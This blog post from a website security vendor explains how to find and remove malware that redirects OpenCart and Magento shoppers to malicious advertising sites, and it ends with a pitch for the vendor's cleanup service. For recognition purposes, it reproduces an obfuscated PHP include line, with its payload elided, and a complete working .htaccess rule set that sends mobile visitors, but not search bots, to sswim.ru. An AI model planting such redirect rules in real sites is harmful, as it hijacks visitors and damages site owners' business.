OpenCart & Magento Malware Redirecting to Malicious Advertising Websites – Steps to Find & Fix

An OpenCart & Magento malware redirecting both desktop and mobile websites to malicious links has been doing rounds. Since last week we have encountered several cases of this malware. There are no specific versions which are being targeted as we have seen this infection in a wide range of versions in both Magento & OpenCart.

Also, check our in-detailed blog post on the different type of malicious redirection and how to fix them.

How Does the Infection Look?

Ahead of blackfriday & cybermonday sales, this malware redirects anyone who visits the infected website to a website containing some offers. Either the websites where this is redirected have some offers or graphic content from porn-like looking websites. One of the customers that came to us has managed to remove some parts of the malware from the desktop website but still, it persisted on the mobile website. In some case, the redirection only happen via Google search (If you search your site in Google & then click on the link). It is mainly because to trick search engine bots to affect your SEO badly. Here’s how the this OpenCart & Magento malware redirecting infected website looks:

Consequences of Redirection Malware:

• Redirection to malicious websites
• Negative effect on search results
• Increase in the creation of 404 pages
• Errors in google webmasters
• Increase in malicious files on the server
• Decrease in traffic & sales due to above all

How to Find & Fix this OpenCart & Malware Website Redirection Spam:

The steps below might advise you to delete some pieces of code. However, sometimes hackers make malicious code look like legit one. So before deleting any files or code, it is recommended to take a backup. Below are the steps to find & fix:

• Check index.php file: We found malicious code included in an index file. The malicious part of the code is encoded and it is difficult to tell what is does without decoding it. Here’s a snippet:

  <?php
  /*2e920*/
  
  @include "\x2fh\x6fm\x65/\x6ez\x67a\x72d\x65n\x2fp\x75b\x6ci\x63_\x68t\x6dl\x2fs\x79s... [[MALICIOUS CODE]]";
  
  /*2e920*/
  // Version
  define('VERSION', '2.0.1.0');
  
  // Configuration
  if (is_file('config.php')) {
  	require_once('config.php');
  }
  
  // Install
  if (!defined('DIR_APPLICATION')) {
  	header('Location: install/index.php');
  	exit;
  }
  
  // Startup
  require_once(DIR_SYSTEM . 'startup.php');
  
  // Registry
  $registry = new Registry();

  If you find this piece of code on the top of your index file, it is recommended to delete.

• Be Sure to Check .htaccess: Another instance of malware can be found in .htaccess file of your server. Be sure to check .htaccess in root folder as well as the one in /admin folder also. A snipped from malware found in /admin folder:

  
  RewriteEngine on
  RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
  RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
  RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
  RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
  RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
  RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
  RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
  RewriteCond %{HTTP:Profile} .+ [NC,OR]
  RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
  RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
  RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
  RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
  RewriteCond %{QUERY_STRING} !noredirect [NC]
  RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC]
  RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]
  RewriteRule ^(.*)$ http://sswim.ru [L,R=302]
  

  All this code present in .htaccess file is malicious. This code redirects mobile devices to malicious domains. If you find this code, it should be removed immediately.

• Look for fishy php files: This is the tricky part. Hackers usually name the files as very legit looking ones and tend to put malicious code in them. Sometimes a lot of code in these legit-looking files is non-harmful but there are a couple of lines that are working for the hackers. In this particular case we have found files like enjoy.php & unzip.php in various OpenCart/Magento directories.

Webmasters don’t lie: Google often warns you if while indexing the website it detects fishy. And if Google is warning you, then you should be worried because this is when your search rankings can take a hit. Something similar happened in Japanese SEO Spam also, which has still been going around. Here’s an example of too many 404 pages being created by malware and google detecting it:

Here’s what you can do from here..

Infections like these hit your business really hard. Every hour of downtime is the loss of customers, reputation and most importantly bad impact on search engine rankings. Hackers after infecting the website have a tendency of leaving backdoors which are difficult to detect even by tech-savvy people. It is important to take a lesson from hacks like these and use a website firewall which protects your website 24x7x365!

For now, if you need assistance in fixing this mess we’ll be happy to do for you. Just sign-up here and our engineers begin the cleanup process within 10-minutes of your signing up.